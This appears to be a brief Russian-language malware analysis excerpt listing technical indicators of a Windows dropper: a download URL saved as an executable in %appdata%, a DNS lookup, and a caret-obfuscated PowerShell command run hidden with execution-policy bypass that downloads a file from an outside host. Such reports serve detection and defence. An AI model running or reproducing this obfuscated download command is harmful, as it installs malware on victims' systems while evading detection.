Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^oWErSHe^ll.eX^E -^exeCuti^o^Np^o^l^IcY^ BY^p^asS ^-n^oPr^ofi^L^e^ ^-WI^nDOW^sTyLe^ h^i^DDEN ^(NeW-o^bJ^E^cT^ ^Sy^st^EM.nET.W^EBC^LIenT).DowN^LOA^dfiL^E('http://www.doorasope.to...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "P^oWErSHe^ll.eX^E -^exeCuti^o^Np^o^l^IcY^ BY^p^asS ^-n^oPr^ofi^L^e^ ^-WI^nDOW^sTyLe^ h^i^DDEN ^(NeW-o^bJ^E^cT^ ^Sy^st^EM.nET.W^EBC^LIenT).DowN^LOA^dfiL^E('http://www.doorasope.to...' (со скрытым окном)